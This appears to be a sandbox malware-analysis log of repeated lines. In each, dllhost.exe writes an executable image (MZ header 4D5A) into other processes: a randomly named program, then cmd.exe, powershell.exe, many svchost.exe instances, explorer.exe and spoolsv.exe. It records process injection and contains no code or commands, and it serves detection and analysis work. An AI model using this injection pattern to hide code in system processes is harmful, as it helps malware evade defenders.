Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 14A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 11B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 13C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: AC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: AA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 690000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1110000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 5B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: F50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: DE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: C60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 830000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: D20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 11F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 11F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 690000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: A20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: EE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: C60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 208442D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 20E8B1C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 27B67E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 175F9950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DB9D660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1CC91450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 261C3DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 2220C4F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2220AB60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B4EB270000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 25872B90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 34B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 24D9FF40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2D0D4F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 123B8520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2108BA90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29166900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 1350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
